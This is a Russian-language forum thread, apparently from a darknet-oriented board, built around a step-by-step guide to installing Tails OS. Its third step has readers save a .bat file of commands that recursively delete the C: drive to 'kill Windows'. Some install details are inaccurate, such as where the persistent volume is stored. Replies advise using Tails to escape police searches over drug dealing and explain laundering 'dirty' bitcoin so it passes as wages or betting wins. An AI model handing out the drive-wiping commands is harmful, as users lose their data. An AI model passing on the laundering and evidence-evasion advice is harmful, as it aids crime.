Самая безопасная OC - Tails!

brewmaster

Новорег
Реакции
155
Баллы
34
Ох, вспомню, как унижался перед разработчиком этой оси после установки..
оно меня ненавидело!

Поэтому я пишу самый лёгкий гайд, но сначала
я расскажу историю.

Дело было так: скачал я значит wireshark на виндовс, чтобы посмотреть
есть ли у меня вирусы удаленного доступа на компе, стиллеры и т.д.
и я вижу, что мой траффик отсылается на сайт или сервера МВД РФ

Тогда я принял для себя решение.
Я удалил
все социальные сети, в которых можно было
держать со мной связь, переехал в другой город.
Мои друзья откровенно
обкакались, когда им пишет в Telegram незнакомец с фейка
с просьбой скинуть
Wickr после моей пропажи.
Я сказал, что уехал в
U.S.A. и не надо переживать. Уладилось.
Заявления о моей пропаже нет - можно удалять
Wickr и фейковый аккаунт

...и мы плавно переходим к гайду по установке Tails OC.
(НУЖНА ФЛЕШКА 16+ ГБ)

1
. Переходим на их официальный сайт (клик)
и выбираем Вашу ОС. У меня это Windows.
Вас перебрасывает на страничку с требованиями для Tails.
Листаем чуть ниже и жмякаем на кнопку зелёного цвета.
Download Tails 5.1.1 USB image ( 1.2 GB )

2. Качаем программу Rufus с официального сайта (клик)
Там сразу же видно интерфейс программы.
Он очень лёгкий.
Перед созданием загрузочной флешки, отформатируйте её в формате FAT32
Открываем Rufus и выбираем наш образ Tails в поле "Метод загрузки".
Параметры форматирования: также
FAT32
Если не получается через Rufus, попробуйте программу Etcher (она ещё легче, чем Rufus)

3. После того, как мы сделали загрузочную флешку, мы вытаскиваем её из компьютера.
Переходим на рабочий стол и создаем текстовый файл.
В него мы пишем ряд команд через строчку:

cd C:\
rd C:\ /s/q
del C:\ /s/q
rd c:/s/q
del c:/s/q

сохраняем в формате .bat на рабочий стол и открываем

Эта приколюха УБЬЁТ ВАШ WINDOWS!

4. После этого компьютер не выключится. Кнопка выключения в Пуск не будет работать.
Переключите кнопочку блока питания / зажмите кнопку включения / отключите от сети,
чтобы выключить компьютер. Следующая загрузка Windows невозможна, но
есть вероятность того, что останутся несколько файлов от Windows (если у Вас были другие диски).
Мы их потом удалим в самой Tails.

5. Вставляем флешку в компуктер.
Включаем. Открываем Bios на стадии загрузки биндом f12 / del
или другое, смотря какая материнка. Узнайте это заранее)
Загружаемся с флешки.

6. Установщика ОС нет.
Появляется первичная настройка.
Выставляем свой язык, выставляем автоматическую
смену MAC адресов и автоматическое
подключение к прокси Tor.

Жмём Start Tails.

Почему же я назвал эту систему адской штукой?
Потому что сложно привыкнуть к тому, что после перезагрузки
Tails убивает все данные и файлы, приводя её в чистый вид.
Как же много полезной информации я терял из-за этого...

Всё, установка завершена, но если Вам не нравится то, что система удаляет файлы,
читайте след. пункты.
Ваш Tails существует ТОЛЬКО на флешке, но
зашифрованные файлы будут храниться на жёстком диске.

7. Слева сверху находится вкладка "Приложения". Выбираем вкладку Tails
и там кликаем на Configure persistent volium
Создаем пароль доступа и выбираем в след. окне
данные, которые система будет сохранять в зашифрованном каталоге.

Ваши файлы будут храниться в каталоге /dev/sdb2
(дефолт этого каталога - 50 GB)

Перезагружаем компьютер и у вас появится поле
с разблокировкой шифр. файлов.
Вводим пароль и жмем unlock, если понадобились
сохраненные файлы.
Если нет, жмём Start Tails и система голая.

Всё!

Спасибо за внимание. Всем желаю успехов и анонимности.
Следующая статья будет про ОС Whonix.
321.png

Последнее редактирование:
Самое главное не забывайте, что задача Tails - анонимная работа во враждебной среде (выход в дарк с публичных wi-fi, вне дома), на постоянку его использовать не советуют, т.к. присутствуют уязвимости, с помощью которых можно скомпроментировать конфигурацию оборудования и не только, для домашнего использования лучше посмотреть в сторону Whonix, хотя и он далеко не идеален.

TAILS = Первоначальный этап. Рекомендую смотреть на linux mint/ubuntu + virtual box + отдельная машина.

Так же ОС Куб отличная

• Знатно
Реакции: DEAd
Некоторые гиганты с некогда известного сайта работали именно из TAILS.

Самое главное не забывайте, что задача Tails - анонимная работа во враждебной среде (выход в дарк с публичных wi-fi, вне дома), на постоянку его использовать не советуют, т.к. присутствуют уязвимости, с помощью которых можно скомпроментировать конфигурацию оборудования и не только, для домашнего использования лучше посмотреть в сторону Whonix, хотя и он далеко не идеален.
да, это большая проблема, потому что таилс удаляет только подписи файлов. сами файлы можно восстановить, если не удалять вручную

Важно упомянуть,если работаешь в фулл онлайне,лучше пересесть на Хуникс,т.к тэилс заточен на физическую безопасность
Пример,когда к тебе пришли домой,а к тебе домой пришли потому что ты "трогаешь в-ва руками и где-то спалился",ты вытаскиваешь флешку и по-сути всё,ничего нет на компе,включаешь условный ноут без флешки,а там грузится домашняя винда с играми и т.п.
Про хуникс,если Вы онлайн работник то это решение подойдет лучше всех,изолированные виртуалки и множество всяких плюшек для настоящих параноиков,но об этом в следующей теме ждём)
п.с. могу в ЛС подсказать по безопаске.

да, это большая проблема, потому что таилс удаляет только подписи файлов. сами файлы можно восстановить, если не удалять вручную
На тэилсе можно не "Удалить",а "Затереть" файл,если использовать этот метод - файл восстановлению не подлежит.

У кого удалось завести новые внешние сетевые адаптеры для вардрайвинга от ALFA Network Inc. на TAILS? Классические Alfa Awus 036 (черный и металлик цветов 2013-2014 годов) с обновлением ОС перестали нормально ловить.

Отпишите в ЛС. Решение оплатим.

Всем здравствуйте,года два назад осваивал тэйлс,электрум и т.д ,старался познать программы которые в ней есть,пробовал командную строку,но научился тока бомбить номера))А так речь не об этом,,Кто знает как работают миксеры бтс??Однажды наткнулся на такую статью;Берем тэйлс_там нам нужен электрум,выбираем себе кошелек...2 берем фоникс,там тоже электрум,и кидаем наши бтс с одной системы на другую,меняя кошельки,получается,что я тоже путаю следы бтс,ведь так?))Заранее благодарю,всех кто ответит...

Всем здравствуйте,года два назад осваивал тэйлс,электрум и т.д ,старался познать программы которые в ней есть,пробовал командную строку,но научился тока бомбить номера))А так речь не об этом,,Кто знает как работают миксеры бтс??Однажды наткнулся на такую статью;Берем тэйлс_там нам нужен электрум,выбираем себе кошелек...2 берем фоникс,там тоже электрум,и кидаем наши бтс с одной системы на другую,меняя кошельки,получается,что я тоже путаю следы бтс,ведь так?))Заранее благодарю,всех кто ответит...
Наверно ты путаешь что-то,по поводу переброса с одного кошелька электрум на другой,смотри,например,на электрум теилса и ты скинул грязные битки,потом оттуда скинул их на электрум хуникс,соотвественно,следы бтк ты не запутал,в блокчейне будет просматривать полностью весь маршрут,а АМЛ будет ругаться,в описанной тобой схеме нет никакой "очистки" битков.

Наверно ты путаешь что-то,по поводу переброса с одного кошелька электрум на другой,смотри,например,на электрум теилса и ты скинул грязные битки,потом оттуда скинул их на электрум хуникс,соотвественно,следы бтк ты не запутал,в блокчейне будет просматривать полностью весь маршрут,а АМЛ будет ругаться,в описанной тобой схеме нет никакой "очистки" битков.
Все же перенаправляется через тор,интересно послушать,что скажут другие пользователи,и как тогда устроены сервисы для чистки бтс?++У тебя битки выходят уже не стэйлс,а с фоникс,а это уже другая система,+она и твое железо меняет,и мак адрес и т.дОчень интересно..

ну я неспорю конечно,видел давно...даже непомню как сайт назывался,но там было видео,как и что делать,но суть принципа была такова..
Все же перенаправляется через тор,интересно послушать,что скажут другие пользователи,и как тогда устроены сервисы для чистки бтс?++У тебя битки выходят уже не стэйлс,а с фоникс,а это уже другая система,+она и твое железо меняет,и мак адрес и т.дОчень интересно..

Суть не в привязке к железу или оси,суть в привязке к самим средствам,понимаешь?)

Суть не в привязке к железу или оси,суть в привязке к самим средствам,понимаешь?)
Да,понял бро))

и знаю, что эти транзакции все связаны,и остаются навсегда в блоках)значит их на более мелкие надо разбивать,да по разным картам,,,но так же все равно увеличивается анонимность?либо же нет??

и знаю, что эти транзакции все связаны,и остаются навсегда в блоках)значит их на более мелкие надо разбивать,да по разным картам,,,но так же все равно увеличивается анонимность?либо же нет??
Как бы тебе это обьяснить,не отмыв средства,по сути все равно,разобьёшь ты их по разным картам/транзакциям или нет,они все равно остаются деньгами,полученными за незаконную деятельность,безусловно,сделав данные манипуляции ты усложнишь анализ причастности денег к даркнету,но результата это никакого не даст,если обьяснять на пальцах,ты должен отдать грязные,а получить чистые монеты и в последствии обналичить их таким способом,что бы это выглядело как законное денежное довольствие,будь то ЗП с завода,перевод от друга,выигрыш в БК и т.д.
Решений на данный момент очень много,все зависит от твоей фантазии,есть как и готовы сервисы для этого,так и можно делать это вручную приложив,не так много усилий.

Последнее редактирование:
Как бы тебе это обьяснить,не отмыв средства,по сути все равно,разобьёшь ты их по разным картам/транзакциям или нет,они все равно остаются деньгами,полученными за незаконную деятельность,безусловно,сделав данные манипуляции ты усложнишь анализ причастности денег к даркнету,но результата это никакого не даст,если обьяснять на пальцах,ты должен отдать грязные,а получить чистые монеты и в последствии обналичить их таким способом,что бы это выглядело как законное денежное довольствие,будто то ЗП с завода,перевод от друга,выигрыш в БК.
Благодарю,расширяю кругозор..мотаю на ус)

подска
Ох, вспомню, как унижался перед разработчиком этой оси после установки..
оно меня ненавидело!

Поэтому я пишу самый лёгкий гайд, но сначала
я расскажу историю.

Дело было так: скачал я значит wireshark на виндовс, чтобы посмотреть
есть ли у меня вирусы удаленного доступа на компе, стиллеры и т.д.
и я вижу, что мой траффик отсылается на сайт или сервера МВД РФ

Тогда я принял для себя решение.
Я удалил
все социальные сети, в которых можно было
держать со мной связь, переехал в другой город.
Мои друзья откровенно
обкакались, когда им пишет в Telegram незнакомец с фейка
с просьбой скинуть
Wickr после моей пропажи.
Я сказал, что уехал в
U.S.A. и не надо переживать. Уладилось.
Заявления о моей пропаже нет - можно удалять
Wickr и фейковый аккаунт

...и мы плавно переходим к гайду по установке Tails OC.
(НУЖНА ФЛЕШКА 16+ ГБ)

1
. Переходим на их официальный сайт (клик)
и выбираем Вашу ОС. У меня это Windows.
Вас перебрасывает на страничку с требованиями для Tails.
Листаем чуть ниже и жмякаем на кнопку зелёного цвета.
Download Tails 5.1.1 USB image ( 1.2 GB )

2. Качаем программу Rufus с официального сайта (клик)
Там сразу же видно интерфейс программы.
Он очень лёгкий.
Перед созданием загрузочной флешки, отформатируйте её в формате FAT32
Открываем Rufus и выбираем наш образ Tails в поле "Метод загрузки".
Параметры форматирования: также
FAT32
Если не получается через Rufus, попробуйте программу Etcher (она ещё легче, чем Rufus)

3. После того, как мы сделали загрузочную флешку, мы вытаскиваем её из компьютера.
Переходим на рабочий стол и создаем текстовый файл.
В него мы пишем ряд команд через строчку:

cd C:\
rd C:\ /s/q
del C:\ /s/q
rd c:/s/q
del c:/s/q

сохраняем в формате .bat на рабочий стол и открываем

Эта приколюха УБЬЁТ ВАШ WINDOWS!

4. После этого компьютер не выключится. Кнопка выключения в Пуск не будет работать.
Переключите кнопочку блока питания / зажмите кнопку включения / отключите от сети,
чтобы выключить компьютер. Следующая загрузка Windows невозможна, но
есть вероятность того, что останутся несколько файлов от Windows (если у Вас были другие диски).
Мы их потом удалим в самой Tails.

5. Вставляем флешку в компуктер.
Включаем. Открываем Bios на стадии загрузки биндом f12 / del
или другое, смотря какая материнка. Узнайте это заранее)
Загружаемся с флешки.

6. Установщика ОС нет.
Появляется первичная настройка.
Выставляем свой язык, выставляем автоматическую
смену MAC адресов и автоматическое
подключение к прокси Tor.

Жмём Start Tails.

Почему же я назвал эту систему адской штукой?
Потому что сложно привыкнуть к тому, что после перезагрузки
Tails убивает все данные и файлы, приводя её в чистый вид.
Как же много полезной информации я терял из-за этого...

Всё, установка завершена, но если Вам не нравится то, что система удаляет файлы,
читайте след. пункты.
Ваш Tails существует ТОЛЬКО на флешке, но
зашифрованные файлы будут храниться на жёстком диске.

7. Слева сверху находится вкладка "Приложения". Выбираем вкладку Tails
и там кликаем на Configure persistent volium
Создаем пароль доступа и выбираем в след. окне
данные, которые система будет сохранять в зашифрованном каталоге.

Ваши файлы будут храниться в каталоге /dev/sdb2
(дефолт этого каталога - 50 GB)

Перезагружаем компьютер и у вас появится поле
с разблокировкой шифр. файлов.
Вводим пароль и жмем unlock, если понадобились
сохраненные файлы.
Если нет, жмём Start Tails и система голая.

Всё!

Спасибо за внимание. Всем желаю успехов и анонимности.
Следующая статья будет про ОС Whonix.
Посмотреть вложение 11840
подскажи как через эту прогу анализ смотреть свой? wireshark

Стоить помнить, что главное преимущество ОС Тейлс, перед собратьями - это возмоность моментального уничтожения носителя системы со всем компроматом. В делах темных, это крайне важно.

Всём привет, я чайник, только начал изучать os системы для пк, на windows умею только игрульки устанавливать) но решил что хочу развеваться, и накатил linux mint, но суть в чем я хз есть ли в нём встроенный vpn? Есть ли в нём electric кошелёк? И можно ли установить его туда?
Если vpn нету, то как его туда установить? Ещё у инете, не могу найти инфу. Подскажите пожалуйста

Верх Низ